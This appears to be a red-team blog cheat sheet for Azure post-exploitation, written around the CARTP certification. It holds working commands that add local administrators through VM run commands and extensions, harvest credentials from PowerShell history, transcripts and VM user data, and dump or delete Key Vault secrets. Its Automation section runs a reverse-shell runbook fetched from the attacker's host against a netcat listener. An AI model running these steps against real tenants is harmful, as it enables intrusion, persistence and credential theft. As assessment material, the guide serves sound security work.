# \[Azure] What To Do If? {% hint style="info" %} Last update: June, 29 2025 {% endhint %} Hi there! In this blog, from its title, we will answer the question **"What to do if you found resource XYZ in Azure?"** It's very simple and will be updated continuously to contain the latest updates, commands, tools, and more. I used this guide to pass **CARTP** (Certified Azure Red Team Professional) certificate from Altered Security, so thanks to them especially Nikhil for the great content. For example, If you have an assessment in an Azure environment and you gained access to a specific account or application-managed identity, what's the first step you will take? what are you gonna do if you find yourself having a specific role assignment to a virtual machine or key vault? Exactly that's what we gonna discuss here, so let's get started... {% hint style="info" %} All the following steps we will follow are circular, not sequential, which means if you logged in and followed the 2 steps then you found leaked credentials and logged in again with the new user, you may need to follow the same steps from the beginning again depends on the resources you have. {% endhint %} *** ## Content 1. Used Tools 2. Azure AD user account & Managed Identity. 3. Virtual Machine & Extensions 4. KeyVaults 5. Storage Blob & Storage Accounts 6. Automation Account 7. SQL Server *** ### Used Tools The most used tool we will depend on is Az Powershell, but we will use different tools for specific tasks, and we will add them here to collect them in one section Az Powershell ```powershell Install-Module -Name Az -Scope CurrentUser -Repository PSGallery -Force ``` Az CLi Download and install it from [here ](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli-windows?tabs=azure-cli) *** ### Azure AD user account & Managed Identity This is your first step in any assessment to have an account or managed identity with specific roles because Azure pentest is unlike any normal website pentest, it seems like configuration review more than doing red team on on-prem environments. So, once you get an account, please do the following steps to know your roles and the resources you have access to. 1. Login using Az Powershell `$passwd = ConvertTo-SecureString "pass@1234" -AsPlainText -Force;$creds = New-Object System.Management.Automation.PSCredential ("test@aykalam.onmicrosoft.com", $passwd);Connect-AzAccount -Credential $creds` 2. Or you can use Az CLI to login via the browser `az login` #### First Checks Here we're doing quick checks to know the resources, role assignment, owned objects and more. 1. Check the `` Get-AzResource` `` to know the resources you have access to. 2. Check the `Get-AzRoleAssignment` to know the roles you have in a specific resource 3. Check the owned objects by the user using the `Az` Module `az ad signed-in-user list-owned-objects` 4. Check if we have Storage accounts / Blob using [MicroBrust Scripts](https://github.com/NetSPI/MicroBurst/tree/master/Misc) 5. Try to login to the Azure portal and check the Deployment history 6. Try to login to the Azure portal and if you have a *Dynamic Group* try to invite other users. 7. If you aren't able to login to the Azure portal due to access policy, check the following solutions: \+ Try to login using the Az CLI, Az PowerShell, or AzureAD tools. \+ Try to change the user-agent in the browser to any other device "Maybe allowed access only for specific devices". *** ### Virtual Machine & Extensions Check the VM network profile and IP 1. Run `Get-AzResource` 2. Run `Get-AzRoleAssignment` because you have to gain read access at least for the VM and the network profile 3. Check the roles you have in this VM from the above API call to get the permissions 4. Get the network profile name `Get-AzVM -Name VMName -ResourceGroupName RGName | select -ExpandProperty NetworkProfile` 5. Get the interface name `Get-AzNetworkInterface -Name InterfaceName` 6. Get the public IP `Get-AzPublicIpAddress -Name IPAddressName` If you have a Command Executer role. Run directly ready scripts to add a user ```powershell Invoke-AzVMRunCommand -VMName VMName -ResourceGroupName RGName -CommandId 'RunPowerShellScript' -ScriptPath 'C:\path\to\your\script' -Verbose # content of the script file $passwd = ConvertTo-SecureString "P@ssw0rd" -AsPlainText -Force New-LocalUser -Name username -Password $passwd Add-LocalGroupMember -Group Administrators -Member username ``` Connect using the created account ```powershell $password = ConvertTo-SecureString 'P@ssw0rd' -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential('username', $Password) $sess = New-PSSession -ComputerName 10.20.30.40 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) Enter-PSSession $sess # After connecting, get the hostname and username of the machine hostname Get-LocalUser # Incase you found a credentials, you can use the following command to authenticate $password = ConvertTo-SecureString 'password' -AsPlainText -Force $creds = New-Object System.Management.Automation.PSCredential('emailuser@ayhags.onmicrosoft.com', $password) Connect-AzAccount -Credential $creds ``` Extract credentials from console history (after gaining a shell) ```powershell cat C:\Users\\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt ``` Check if there's any User Data stored in the machine (after gaining a shell) ```powershell $userData = Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021-01-01&format=text" [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData)) ``` Try the PowerShell transcripts (after gaining a shell) ```powershell cat C:\Transcripts\\PowerShell_transcript.DESKTOP- M7C1AFM.6sZJrDuN..txt ``` Dealing with **Extensions** if you have read or write permission ```powershell # Check if the extensions are installed Get-AzVMExtension -ResourceGroupName "RGName" -VMName "VMName" # We will be unable to create new extension but can modify the "commandToExecute" to add your own local user Set-AzVMExtension -ResourceGroupName "RGName" -ExtensionName "ExecCmd" -VMName "VMName" -Location "Location" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users /add /Y; net localgroup administrators /add"}' ``` If you found yourself in the AzureAD Connect machine with On-Prem, try to reset the Sync\_ account ```powershell # Check if you are in the AzureAD connect machine, the used module will be installed by default for any connect machine Get-ADSyncConnector ``` *** ### KeyVault At first, we will check if we have access to key vaults or not, and if we have, then we will try to get its secret and read it as plain text. It's very simple. ```powershell # list the key vaults we have access to Get-AzKeyVault Vault Name: ResearchKeyVault # Dump the secret name from a specific vault Get-AzKeyVaultSecret -VaultName ResearchKeyVault Name: researchkeyvault # Read the secret Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name researchkeyvault –AsPlainText username: accountName@ayhags.onmicrosoft.com ; password:adfa@asdfa$#*!@# ``` ```bash # list all keyvaults az keyvault list --query "[].{Name:name, Location:location, URI:properties.vaultUri}" -o table # show access policy az keyvault show --name MYNAME --query properties.accessPolicies # list key, secrets and ceritificates az keyvault secret list --vault-name MYNAME -o table az keyvault key list --vault-name MYNAME -o table az keyvault certificate list --vault-name MYNAME -o table # create and read secrets az keyvault secret set --vault-name MYNAME --name "TestSecret" --value "Test123" az keyvault secret show --vault-name MYNAME --name "TestSecret" # if success, try to delete it or delete any other secret az keyvault secret delete --vault-name MYNAME --name "TestSecret" az keyvault secret list-deleted --vault-name MYNAME az keyvault secret recover --vault-name MYNAME --name "TestSecret" # check soft delete and purge protections az keyvault show --name MYNAME --query "properties.enableSoftDelete" az keyvault show --name MYNAME --query "properties.enablePurgeProtection" ``` *** ### Storage Blob / Accounts Enumerate the storage blob using `MicroBrust` ```powershell . C:\AzAD\Tools\MicroBurst\Misc\Invoke-EnumerateAzureBlobs.ps1 Invoke-EnumerateAzureBlobs -Base ``` If you found a container, try to access it using the ` ` tag parameter after the URL endpoint. Check Containers If you find your user has access to the storage account. Check if there is a *container* that the user has access to ```powershell PS C:\AzAD\Tools> Get-AzResource Name: RName ResourceGroupName: RGName ResourceType: Microsoft.Storage/storageAccounts PS C:\AzAD\Tools> Get-AzStorageContainer -Context (New-AzStorageContext -StorageAccountName ) # After that if you foudn a container, login using the account you have to the Storage Explorer via the Subscription tab ``` If you found **SAS** URL or Account creds have access to Storage Blob, Open the **Storage Explorer** application and authenticate using the SAS URL or the Account Check the Storage Accounts using AZ CLI ```bash # this command will check the public access and HTTPS allowance. # will check the network rules in use. # will check the encryption and authentication configuration. az storage account show --name MYNAME -o json | jq '{ allowBlobPublicAccess, enableHttpsTrafficOnly, networkRuleSet: { defaultAction: .networkRuleSet.defaultAction, ipRules: .networkRuleSet.ipRules, virtualNetworkRules: .networkRuleSet.virtualNetworkRules }, kind, encryption: { keySource: .encryption.keySource, blobEnabled: .encryption.services.blob.enabled }, accessTier, allowSharedKeyAccess, azureFilesIdentityBasedAuthentication: .azureFilesIdentityBasedAuthentication }' ``` *** ### Automation Account Check your permissions over the automation account ```powershell Get-AzRoleAssignment -Scope /subscriptions//resourceGroups//providers/Microsoft.Automation/automationAccounts/HybridAutomation ``` Check if the hybrid worker is in use in the automation account ```powershell PS C:\AzAD\Tools> Get-AzAutomationHybridWorkerGroup -AutomationAccountName -ResourceGroupName ResourceGroupName : AyKalam AutomationAccountName : HybridAutomation Name : Workergroup1 RunbookWorker : {} GroupType : User ``` Gain reverse shell access Import PowerShell runbook file to download a reverse shell from your host machine and run it on the hybrid worker. ```powershell # Import the runbook file # filename.ps1 is any powershell reverse shell command. Import-AzAutomationRunbook -Name -Path C:\Tools\filename.ps1 -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Type PowerShell -Force -Verbose # publish the runbook Publish-AzAutomationRunbook -RunbookName -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Verbose # run your netcat listner nc.exe -lvp 4444 # Start the runbook Start-AzAutomationRunbook -RunbookName -RunOn Workergroup1 -AutomationAccountName HybridAutomation -ResourceGroupName AyKalam -Verbose ``` *** ### SQL Server 
az sql server show --name <server-name> --resource-group <rg-name>
# this script will look for 
# publicNetworkAccess (should be Disabled in secure configs)
# minimalTlsVersion (should be 1.2 or higher)
# aadAdmin (Azure AD integration status)
*** To be continued... **Thanks for reading <3 Stay in touch** [LinkedIn ](https://www.linkedin.com/in/eslam3kl/)| [GitHub](https://github.com/eslam3kl) \